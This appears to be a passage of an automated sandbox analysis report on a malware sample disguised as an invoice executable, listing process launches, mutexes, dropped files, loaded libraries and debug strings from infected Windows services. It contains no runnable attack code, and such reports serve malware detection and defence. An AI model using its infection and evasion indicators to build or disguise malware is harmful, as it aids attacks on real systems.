      Source: wbengine.exe.2.drBinary string: >`WindowsBackupLinksLink_{47b7fa87-ce42-48ff-8b18-2f1088121503}Child_{47b7fa87-ce42-48ff-8b18-2f1088121503}\\?\Globalroot\Device\Harddisk%lu\Partition1\a
      Source: wbengine.exe.2.drBinary string: \Device\Harddisk%lu\Partition%lu
      Source: wbengine.exe.2.drBinary string: !m_bAsyncInProgressd:\w7rtm\base\stor\blb\engine\service\engine.cpp!m_pAsyncRefg_cInitialized == 0SeBackupPrivilegeSeRestorePrivilegefveapi.dllm_pAsyncRef == NULL && m_eOperationType == BLB_OT_UNDEFINEDcVolume < cMaxVolumecTarget < cMaxTargetm_pAsyncHelper == NULL && m_pAsyncRef == NULL*ppAsync != NULLm_bIsRecoveryStartedBlbMountedVolumesBlbMountedVolumeFile%d\\?\GLOBALROOT\Device\HarddiskVolumeFile%dm_numNetworkShareVolumes > 0NOT currOffset < bufSizeOutm_pAsyncHelper!m_pAsyncHelperShowWarningwszFileSpecsXMLpTemplatepbAllCriticalpbSystemStatepTargetpMedia->m_eMediaType == BLB_MT_SHINY || pMedia->m_eMediaType == BLB_MT_REMOVABLEpCatBackupSet->m_cTarget == 1Software\Policies\Microsoft\Windows\Backup\ClientSoftware\Policies\Microsoft\Windows\Backup\ServerDisableBackupToNetworkNoBackupToNetworkDisableBackupToDiskNoBackupToDiskDisableBackupToOpticalNoBackupToOpticalNoRunNowBackupOnlySystemBackupDisableSystemBackupUIRestoreTimeSoftware\Microsoft\Windows NT\CurrentVersion\SystemRestoreRestoreStatusResultguidBackupSetId != GUID_NULLcMedia > 0rgCatBackupSet[i].m_wszCurrentTargetNamem_pCatalogSystempTemplate->m_bIsScheduledTemplatepOldTemplate != NULLpNewTemplate != NULLpbstTypergBackupVolumesrgAllVolumesInfocBackupVolumecVolumeInfotk
      Source: classification engineClassification label: mal100.spre.troj.evad.winEXE@18/88@39/10
      Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeFile created: C:\Program Files (x86)\Mozilla Maintenance Service\logs\logECFE.tmpJump to behavior
      Source: C:\Users\user\Desktop\invoice_96.73.exeFile created: C:\Users\user\AppData\Roaming\23f9eaead4df6ab2.binJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeMutant created: \BaseNamedObjects\Global\Multiarch.m0yv-23f9eaead4df6ab29ea72c54-b
      Source: C:\Users\user\Desktop\invoice_96.73.exeMutant created: \Sessions\1\BaseNamedObjects\Global\Multiarch.m0yv-23f9eaead4df6ab2-inf
      Source: C:\Users\user\Desktop\invoice_96.73.exeMutant created: \Sessions\1\BaseNamedObjects\Global\Multiarch.m0yv-23f9eaead4df6ab2ab63edc8-b
      Source: C:\Users\user\Desktop\invoice_96.73.exeFile created: C:\Users\user\AppData\Local\Temp\autABDA.tmpJump to behavior
      Source: C:\Users\user\Desktop\invoice_96.73.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
      Source: invoice_96.73.exeReversingLabs: Detection: 95%
      Source: unknownProcess created: C:\Users\user\Desktop\invoice_96.73.exe "C:\Users\user\Desktop\invoice_96.73.exe"
      Source: unknownProcess created: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe "C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe"
      Source: C:\Users\user\Desktop\invoice_96.73.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\invoice_96.73.exe"
      Source: unknownProcess created: C:\Windows\System32\alg.exe C:\Windows\System32\alg.exe
      Source: unknownProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_state.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_state.exe
      Source: unknownProcess created: C:\Windows\ehome\ehrecvr.exe C:\Windows\ehome\ehRecvr.exe
      Source: unknownProcess created: C:\Windows\ehome\ehsched.exe C:\Windows\ehome\ehsched.exe
      Source: unknownProcess created: C:\Windows\System32\FXSSVC.exe C:\Windows\system32\fxssvc.exe
      Source: unknownProcess created: C:\Windows\System32\ieetwcollector.exe C:\Windows\system32\IEEtwCollector.exe /V
      Source: unknownProcess created: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe "C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe"
      Source: unknownProcess created: C:\Windows\System32\msdtc.exe C:\Windows\System32\msdtc.exe
      Source: unknownProcess created: C:\Windows\System32\msiexec.exe C:\Windows\system32\msiexec.exe /V
      Source: unknownProcess created: C:\Windows\SysWOW64\perfhost.exe C:\Windows\SysWow64\perfhost.exe
      Source: unknownProcess created: C:\Windows\System32\Locator.exe C:\Windows\system32\locator.exe
      Source: unknownProcess created: C:\Windows\System32\snmptrap.exe C:\Windows\System32\snmptrap.exe
      Source: unknownProcess created: C:\Windows\System32\vds.exe C:\Windows\System32\vds.exe
      Source: unknownProcess created: C:\Windows\System32\wbengine.exe "C:\Windows\system32\wbengine.exe"
      Source: C:\Users\user\Desktop\invoice_96.73.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\invoice_96.73.exe"Jump to behavior
      Source: C:\Users\user\Desktop\invoice_96.73.exeSection loaded: wow64win.dllJump to behavior
      Source: C:\Users\user\Desktop\invoice_96.73.exeSection loaded: wow64cpu.dllJump to behavior
      Source: C:\Users\user\Desktop\invoice_96.73.exeSection loaded: wsock32.dllJump to behavior
      Source: C:\Users\user\Desktop\invoice_96.73.exeSection loaded: version.dllJump to behavior
      Source: C:\Users\user\Desktop\invoice_96.73.exeSection loaded: winmm.dllJump to behavior
      Source: C:\Users\user\Desktop\invoice_96.73.exeSection loaded: mpr.dllJump to behavior
      Source: C:\Users\user\Desktop\invoice_96.73.exeSection loaded: iphlpapi.dllJump to behavior
      Source: C:\Users\user\Desktop\invoice_96.73.exeSection loaded: winnsi.dllJump to behavior
      Source: C:\Users\user\Desktop\invoice_96.73.exeSection loaded: uxtheme.dllJump to behavior
      Source: C:\Users\user\Desktop\invoice_96.73.exeSection loaded: winhttp.dllJump to behavior
      Source: C:\Users\user\Desktop\invoice_96.73.exeSection loaded: webio.dllJump to behavior
      Source: C:\Users\user\Desktop\invoice_96.73.exeSection loaded: secur32.dllJump to behavior
      Source: C:\Users\user\Desktop\invoice_96.73.exeSection loaded: dnsapi.dllJump to behavior
      Source: C:\Users\user\Desktop\invoice_96.73.exeSection loaded: ntmarta.dllJump to behavior
      Source: C:\Users\user\Desktop\invoice_96.73.exeSection loaded: dwmapi.dllJump to behavior
      Source: C:\Users\user\Desktop\invoice_96.73.exeSection loaded: dhcpcsvc6.dllJump to behavior
      Source: C:\Users\user\Desktop\invoice_96.73.exeSection loaded: dhcpcsvc.dllJump to behavior
      Source: C:\Users\user\Desktop\invoice_96.73.exeSection loaded: cryptsp.dllJump to behavior
      Source: C:\Users\user\Desktop\invoice_96.73.exeSection loaded: credssp.dllJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSection loaded: wow64win.dllJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSection loaded: wow64cpu.dllJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSection loaded: winhttp.dllJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSection loaded: webio.dllJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSection loaded: mpr.dllJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSection loaded: secur32.dllJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSection loaded: dnsapi.dllJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSection loaded: ntmarta.dllJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSection loaded: iphlpapi.dllJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSection loaded: winnsi.dllJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSection loaded: dhcpcsvc6.dllJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSection loaded: dhcpcsvc.dllJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSection loaded: cryptsp.dllJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSection loaded: credssp.dllJump to behavior
      Source: C:\Windows\SysWOW64\svchost.exeSection loaded: wow64win.dllJump to behavior
      Source: C:\Windows\SysWOW64\svchost.exeSection loaded: wow64cpu.dllJump to behavior
      Source: C:\Windows\System32\alg.exeSection loaded: atl.dllJump to behavior
      Source: C:\Windows\System32\alg.exeSection loaded: wsock32.dllJump to behavior
      Source: C:\Windows\System32\alg.exeSection loaded: mswsock.dllJump to behavior
      Source: C:\Windows\System32\alg.exeSection loaded: cryptsp.dllJump to behavior
      Source: C:\Windows\System32\alg.exeSection loaded: rpcrtremote.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_state.exeSection loaded: mswsock.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_state.exeSection loaded: mscoree.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_state.exeSection loaded: webengine4.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_state.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_state.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_state.exeSection loaded: winhttp.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_state.exeSection loaded: webio.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_state.exeSection loaded: mpr.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_state.exeSection loaded: secur32.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_state.exeSection loaded: dnsapi.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_state.exeSection loaded: ntmarta.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_state.exeSection loaded: version.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_state.exeSection loaded: cryptsp.dllJump to behavior
      Source: C:\Windows\ehome\ehrecvr.exeSection loaded: version.dllJump to behavior
      Source: C:\Windows\ehome\ehrecvr.exeSection loaded: ehtrace.dllJump to behavior
      Source: C:\Windows\ehome\ehrecvr.exeSection loaded: slc.dllJump to behavior
      Source: C:\Windows\ehome\ehrecvr.exeSection loaded: winhttp.dllJump to behavior
      Source: C:\Windows\ehome\ehrecvr.exeSection loaded: webio.dllJump to behavior
      Source: C:\Windows\ehome\ehrecvr.exeSection loaded: mpr.dllJump to behavior
      Source: C:\Windows\ehome\ehrecvr.exeSection loaded: secur32.dllJump to behavior
      Source: C:\Windows\ehome\ehrecvr.exeSection loaded: dnsapi.dllJump to behavior
      Source: C:\Windows\ehome\ehrecvr.exeSection loaded: ntmarta.dllJump to behavior
      Source: C:\Windows\ehome\ehrecvr.exeSection loaded: ehetw.dllJump to behavior
      Source: C:\Windows\ehome\ehrecvr.exeSection loaded: cryptsp.dllJump to behavior
      Source: C:\Windows\ehome\ehrecvr.exeSection loaded: rpcrtremote.dllJump to behavior
      Source: C:\Windows\ehome\ehrecvr.exeSection loaded: winmm.dllJump to behavior
      Source: C:\Windows\ehome\ehrecvr.exeSection loaded: msdmo.dllJump to behavior
      Source: C:\Windows\ehome\ehrecvr.exeSection loaded: iphlpapi.dllJump to behavior
      Source: C:\Windows\ehome\ehrecvr.exeSection loaded: winnsi.dllJump to behavior
      Source: C:\Windows\ehome\ehrecvr.exeSection loaded: wevtapi.dllJump to behavior
      Source: C:\Windows\ehome\ehrecvr.exeSection loaded: dhcpcsvc6.dllJump to behavior
      Source: C:\Windows\ehome\ehrecvr.exeSection loaded: dhcpcsvc.dllJump to behavior
      Source: C:\Windows\ehome\ehrecvr.exeSection loaded: ssdpapi.dllJump to behavior
      Source: C:\Windows\ehome\ehsched.exeSection loaded: slc.dllJump to behavior
      Source: C:\Windows\ehome\ehsched.exeSection loaded: winhttp.dllJump to behavior
      Source: C:\Windows\ehome\ehsched.exeSection loaded: webio.dllJump to behavior
      Source: C:\Windows\ehome\ehsched.exeSection loaded: mpr.dllJump to behavior
      Source: C:\Windows\ehome\ehsched.exeSection loaded: secur32.dllJump to behavior
      Source: C:\Windows\ehome\ehsched.exeSection loaded: dnsapi.dllJump to behavior
      Source: C:\Windows\ehome\ehsched.exeSection loaded: ntmarta.dllJump to behavior
      Source: C:\Windows\ehome\ehsched.exeSection loaded: ehetw.dllJump to behavior
      Source: C:\Windows\ehome\ehsched.exeSection loaded: cryptsp.dllJump to behavior
      Source: C:\Windows\ehome\ehsched.exeSection loaded: rpcrtremote.dllJump to behavior
      Source: C:\Windows\System32\FXSSVC.exeSection loaded: pcwum.dllJump to behavior
      Source: C:\Windows\System32\FXSSVC.exeSection loaded: version.dllJump to behavior
      Source: C:\Windows\System32\FXSSVC.exeSection loaded: tapi32.dllJump to behavior
      Source: C:\Windows\System32\FXSSVC.exeSection loaded: credui.dllJump to behavior
      Source: C:\Windows\System32\FXSSVC.exeSection loaded: fxstiff.dllJump to behavior
      Source: C:\Windows\System32\FXSSVC.exeSection loaded: slc.dllJump to behavior
      Source: C:\Windows\System32\FXSSVC.exeSection loaded: slc.dllJump to behavior
      Source: C:\Windows\System32\FXSSVC.exeSection loaded: slc.dllJump to behavior
      Source: C:\Windows\System32\FXSSVC.exeSection loaded: slc.dllJump to behavior
      Source: C:\Windows\System32\ieetwcollector.exeSection loaded: cryptsp.dllJump to behavior
      Source: C:\Windows\System32\ieetwcollector.exeSection loaded: rpcrtremote.dllJump to behavior
      Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeSection loaded: wow64win.dllJump to behavior
      Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeSection loaded: wow64cpu.dllJump to behavior
      Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeSection loaded: version.dllJump to behavior
      Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeSection loaded: winhttp.dllJump to behavior
      Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeSection loaded: webio.dllJump to behavior
      Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeSection loaded: mpr.dllJump to behavior
      Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeSection loaded: secur32.dllJump to behavior
      Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeSection loaded: dnsapi.dllJump to behavior
      Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeSection loaded: ntmarta.dllJump to behavior
      Source: C:\Windows\System32\msdtc.exeSection loaded: msdtctm.dllJump to behavior
      Source: C:\Windows\System32\msdtc.exeSection loaded: msdtcprx.dllJump to behavior
      Source: C:\Windows\System32\msdtc.exeSection loaded: mtxclu.dllJump to behavior
      Source: C:\Windows\System32\msdtc.exeSection loaded: clusapi.dllJump to behavior
      Source: C:\Windows\System32\msdtc.exeSection loaded: cryptdll.dllJump to behavior
      Source: C:\Windows\System32\msdtc.exeSection loaded: resutils.dllJump to behavior
      Source: C:\Windows\System32\msdtc.exeSection loaded: version.dllJump to behavior
      Source: C:\Windows\System32\msdtc.exeSection loaded: bcrypt.dllJump to behavior
      Source: C:\Windows\System32\msdtc.exeSection loaded: ktmw32.dllJump to behavior
      Source: C:\Windows\System32\msdtc.exeSection loaded: msdtclog.dllJump to behavior
      Source: C:\Windows\System32\msdtc.exeSection loaded: winmm.dllJump to behavior
      Source: C:\Windows\System32\msdtc.exeSection loaded: xolehlp.dllJump to behavior
      Source: C:\Windows\System32\msdtc.exeSection loaded: mswsock.dllJump to behavior
      Source: C:\Windows\System32\msdtc.exeSection loaded: dnsapi.dllJump to behavior
      Source: C:\Windows\System32\msdtc.exeSection loaded: comres.dllJump to behavior
      Source: C:\Windows\System32\msdtc.exeSection loaded: msdtcvsp1res.dllJump to behavior
      Source: C:\Windows\System32\msdtc.exeSection loaded: mtxoci.dllJump to behavior
      Source: C:\Windows\System32\msdtc.exeSection loaded: oci.dllJump to behavior
      Source: C:\Windows\System32\msdtc.exeSection loaded: secur32.dllJump to behavior
      Source: C:\Windows\System32\msdtc.exeSection loaded: cryptsp.dllJump to behavior
      Source: C:\Windows\System32\msdtc.exeSection loaded: credssp.dllJump to behavior
      Source: C:\Windows\System32\msdtc.exeSection loaded: rpcrtremote.dllJump to behavior
      Source: C:\Windows\System32\msdtc.exeSection loaded: ntmarta.dllJump to behavior
      Source: C:\Windows\System32\msiexec.exeSection loaded: msi.dll
      Source: C:\Windows\System32\msiexec.exeSection loaded: mpr.dll
      Source: C:\Windows\System32\msiexec.exeSection loaded: sfc.dll
      Source: C:\Windows\System32\msiexec.exeSection loaded: sfc_os.dll
      Source: C:\Windows\System32\msiexec.exeSection loaded: dwmapi.dll
      Source: C:\Windows\System32\msiexec.exeSection loaded: cryptsp.dll
      Source: C:\Windows\System32\msiexec.exeSection loaded: rpcrtremote.dll
      Source: C:\Windows\SysWOW64\perfhost.exeSection loaded: wow64win.dll
      Source: C:\Windows\SysWOW64\perfhost.exeSection loaded: wow64cpu.dll
      Source: C:\Windows\SysWOW64\perfhost.exeSection loaded: winhttp.dll
      Source: C:\Windows\SysWOW64\perfhost.exeSection loaded: webio.dll
      Source: C:\Windows\SysWOW64\perfhost.exeSection loaded: mpr.dll
      Source: C:\Windows\SysWOW64\perfhost.exeSection loaded: secur32.dll
      Source: C:\Windows\SysWOW64\perfhost.exeSection loaded: dnsapi.dll
      Source: C:\Windows\SysWOW64\perfhost.exeSection loaded: ntmarta.dll
      Source: C:\Windows\SysWOW64\perfhost.exeSection loaded: rpcrtremote.dll
      Source: C:\Windows\System32\snmptrap.exeSection loaded: dnsapi.dll
      Source: C:\Windows\System32\vds.exeSection loaded: atl.dll
      Source: C:\Windows\System32\vds.exeSection loaded: osuninst.dll
      Source: C:\Windows\System32\vds.exeSection loaded: vdsutil.dll
      Source: C:\Windows\System32\vds.exeSection loaded: netapi32.dll
      Source: C:\Windows\System32\vds.exeSection loaded: netutils.dll
      Source: C:\Windows\System32\vds.exeSection loaded: srvcli.dll
      Source: C:\Windows\System32\vds.exeSection loaded: wkscli.dll
      Source: C:\Windows\System32\vds.exeSection loaded: ulib.dll
      Source: C:\Windows\System32\vds.exeSection loaded: ifsutil.dll
      Source: C:\Windows\System32\vds.exeSection loaded: cryptsp.dll
      Source: C:\Windows\System32\vds.exeSection loaded: rpcrtremote.dll
      Source: C:\Windows\System32\wbengine.exeSection loaded: vssapi.dll
      Source: C:\Windows\System32\wbengine.exeSection loaded: atl.dll
      Source: C:\Windows\System32\wbengine.exeSection loaded: vsstrace.dll
      Source: C:\Windows\System32\wbengine.exeSection loaded: netapi32.dll
      Source: C:\Windows\System32\wbengine.exeSection loaded: netutils.dll
      Source: C:\Windows\System32\wbengine.exeSection loaded: srvcli.dll
      Source: C:\Windows\System32\wbengine.exeSection loaded: wkscli.dll
      Source: C:\Windows\System32\wbengine.exeSection loaded: xmllite.dll
      Source: C:\Windows\System32\wbengine.exeSection loaded: bcrypt.dll
      Source: C:\Windows\System32\wbengine.exeSection loaded: virtdisk.dll
      Source: C:\Windows\System32\wbengine.exeSection loaded: fltlib.dll
      Source: C:\Windows\System32\wbengine.exeSection loaded: clusapi.dll
      Source: C:\Windows\System32\wbengine.exeSection loaded: cryptdll.dll
      Source: C:\Windows\System32\wbengine.exeSection loaded: fveapi.dll
      Source: C:\Windows\System32\wbengine.exeSection loaded: tbs.dll
      Source: C:\Windows\System32\wbengine.exeSection loaded: fvecerts.dll
      Source: C:\Windows\System32\wbengine.exeSection loaded: logoncli.dll
      Source: C:\Windows\System32\wbengine.exeSection loaded: cscapi.dll
      Source: C:\Windows\System32\wbengine.exeSection loaded: cryptsp.dll
      Source: C:\Windows\System32\wbengine.exeSection loaded: rpcrtremote.dll
      Source: C:\Windows\ehome\ehrecvr.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{A5CF917A-0F75-4B29-A0A0-5348E501DA59}\InprocServer32Jump to behavior
      Source: invoice_96.73.exeStatic file information: File size 1799680 > 1048576
      Source: invoice_96.73.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
      Source: Binary string: C:\work\p4\splinters\Splinters\S\BuildResults\bin\Win32\ReaderRelease\FullTrustNotifier\FullTrustNotifier.pdb77.GCTL source: armsvc.exe, 00000002.00000003.549948881.00000000015A0000.00000004.00001000.00020000.00000000.sdmp, FullTrustNotifier.exe.2.dr
      Source: Binary string: D:\DCB\CBT_Main\BuildResults\bin\Win32\Release\armsvc.pdb source: invoice_96.73.exe, 00000000.00000003.346461774.0000000002A90000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe.0.dr
      Source: Binary string: TextExtractor.pdb55. source: armsvc.exe, 00000002.00000003.528202244.00000000015A0000.00000004.00001000.00020000.00000000.sdmp
      Source: Binary string: msiexec.pdb source: armsvc.exe, 00000002.00000003.384565633.00000000020C0000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.384370417.00000000020E0000.00000004.00001000.00020000.00000000.sdmp
      Source: Binary string: c:\re\workspace\8-2-build-windows-amd64-cygwin\jdk8u121\8372\build\windows-amd64\jdk\objs\ktab_objs\ktab.pdb source: armsvc.exe, 00000002.00000003.469269296.0000000001FE0000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.470738958.0000000001BB0000.00000004.00001000.00020000.00000000.sdmp, ktab.exe.2.dr
      Source: Binary string: AcroBroker.pdb source: armsvc.exe, 00000002.00000003.494060398.0000000001520000.00000004.00001000.00020000.00000000.sdmp
      Source: Binary string: c:\re\workspace\8-2-build-windows-amd64-cygwin\jdk8u121\8372\build\windows-amd64\jdk\objs\klist_objs\klist.pdb source: armsvc.exe, 00000002.00000003.466271925.0000000001FE0000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.468672844.0000000001BB0000.00000004.00001000.00020000.00000000.sdmp
      Source: Binary string: vssvc.pdb source: armsvc.exe, 00000002.00000003.400446853.00000000020C0000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.397705170.0000000002340000.00000004.00001000.00020000.00000000.sdmp
      Source: Binary string: ADelRCP_Exec.pdb source: armsvc.exe, 00000002.00000003.535376805.00000000015A0000.00000004.00001000.00020000.00000000.sdmp
      Source: Binary string: sppsvc.pdb source: armsvc.exe, 00000002.00000003.393285094.0000000002340000.00000004.00001000.00020000.00000000.sdmp
      Source: Binary string: c:\re\workspace\8-2-build-windows-amd64-cygwin\jdk8u121\8372\build\windows-amd64\deploy\tmp\jp2launcher\obj64\jp2launcher.pdb source: armsvc.exe, 00000002.00000003.459702439.0000000001FE0000.00000004.00001000.00020000.00000000.sdmp
      Source: Binary string: PresentationFontCache.pdb source: armsvc.exe, 00000002.00000003.377542137.0000000002040000.00000004.00001000.00020000.00000000.sdmp
      Source: Binary string: WCChromeNativeMessagingHost.pdb88/ source: armsvc.exe, 00000002.00000003.543127259.00000000015A0000.00000004.00001000.00020000.00000000.sdmp
      Source: Binary string: msiexec.pdbE3 source: armsvc.exe, 00000002.00000003.384565633.00000000020C0000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.384370417.00000000020E0000.00000004.00001000.00020000.00000000.sdmp
      Source: Binary string: aspnet_state.pdb source: invoice_96.73.exe, 00000000.00000003.353700920.00000000037C0000.00000004.00001000.00020000.00000000.sdmp
      Source: Binary string: t:\dw\x86\ship\0\dwtrig20.pdb\ship\0\dwtrig20.exe\bbtopt\dwtrig20O.pdbTb source: armsvc.exe, 00000002.00000003.436668125.0000000001FE0000.00000004.00001000.00020000.00000000.sdmp
      Source: Binary string: c:\re\workspace\8-2-build-windows-amd64-cygwin\jdk8u121\8372\build\windows-amd64\deploy\tmp\javacplexec\obj64\javacpl.pdb source: armsvc.exe, 00000002.00000003.453426244.0000000001FE0000.00000004.00001000.00020000.00000000.sdmp
      Source: Binary string: wntdll.pdb source: invoice_96.73.exe, 00000000.00000003.350225262.0000000004220000.00000004.00001000.00020000.00000000.sdmp, invoice_96.73.exe, 00000000.00000003.353569093.0000000004380000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000004.00000003.382195696.0000000000710000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000004.00000002.387726638.0000000000A20000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000004.00000002.387726638.00000000008A0000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000004.00000003.381468216.0000000000450000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: c:\re\workspace\8-2-build-windows-amd64-cygwin\jdk8u121\8372\build\windows-amd64\deploy\jre-image\bin\javaws.pdb source: armsvc.exe, 00000002.00000003.456767187.0000000001FE0000.00000004.00001000.00020000.00000000.sdmp
      Source: Binary string: c:\re\workspace\8-2-build-windows-amd64-cygwin\jdk8u121\8372\build\windows-amd64\jdk\objs\servertool_objs\servertool.pdb source: armsvc.exe, 00000002.00000003.484334362.0000000001FE0000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.485863141.0000000001BB0000.00000004.00001000.00020000.00000000.sdmp, servertool.exe.2.dr
      Source: Binary string: FXSSVC.pdb source: armsvc.exe, 00000002.00000003.375221834.0000000002110000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.375401545.00000000020C0000.00000004.00001000.00020000.00000000.sdmp
      Source: Binary string: C:\Perforce\FRMain\code\build\win\results\Release\info\arh.pdb source: armsvc.exe, 00000002.00000003.539704237.00000000015A0000.00000004.00001000.00020000.00000000.sdmp
      Source: Binary string: snmptrap.pdb@SH source: armsvc.exe, 00000002.00000003.391469846.0000000002030000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.391488401.0000000002040000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.392623971.00000000020C0000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.391662820.00000000020C0000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.391640685.00000000020C0000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.392746098.0000000001CA0000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.391569645.0000000002040000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.391549027.0000000002040000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.391679575.00000000020C0000.00000004.00001000.00020000.00000000.sdmp
      Source: Binary string: WmiApSrv.pdbGCTL source: armsvc.exe, 00000002.00000003.410168312.00000000020C0000.00000004.00001000.00020000.00000000.sdmp
      Source: Binary string: ehSched.pdb source: armsvc.exe, 00000002.00000003.368828729.0000000002040000.00000004.00001000.00020000.00000000.sdmp
      Source: Binary string: mscorsvw.pdbD source: armsvc.exe, 00000002.00000003.356595540.00000000020C0000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.356855501.00000000020D0000.00000004.00001000.00020000.00000000.sdmp
      Source: Binary string: locator.pdb@SH source: armsvc.exe, 00000002.00000003.390348820.00000000020C0000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.391373712.0000000001CA0000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.390223997.0000000002040000.00000004.00001000.00020000.00000000.sdmp, Locator.exe.2.dr
      Source: Binary string: locator.pdb source: armsvc.exe, 00000002.00000003.390348820.00000000020C0000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.391373712.0000000001CA0000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.390223997.0000000002040000.00000004.00001000.00020000.00000000.sdmp, Locator.exe.2.dr
      Source: Binary string: Eula.pdb995 source: armsvc.exe, 00000002.00000003.546479748.00000000015A0000.00000004.00001000.00020000.00000000.sdmp
      Source: Binary string: msdtcexe.pdbE3 source: armsvc.exe, 00000002.00000003.383128547.0000000002040000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.383373251.0000000002040000.00000004.00001000.00020000.00000000.sdmp
      Source: Binary string: AcroRd32Info.pdb''$ source: armsvc.exe, 00000002.00000003.525307374.0000000001520000.00000004.00001000.00020000.00000000.sdmp
      Source: Binary string: ALG.pdbH source: invoice_96.73.exe, 00000000.00000003.353143094.0000000002990000.00000004.00001000.00020000.00000000.sdmp, invoice_96.73.exe, 00000000.00000003.349561520.00000000037F0000.00000004.00001000.00020000.00000000.sdmp, invoice_96.73.exe, 00000000.00000003.349725788.0000000003690000.00000004.00001000.00020000.00000000.sdmp
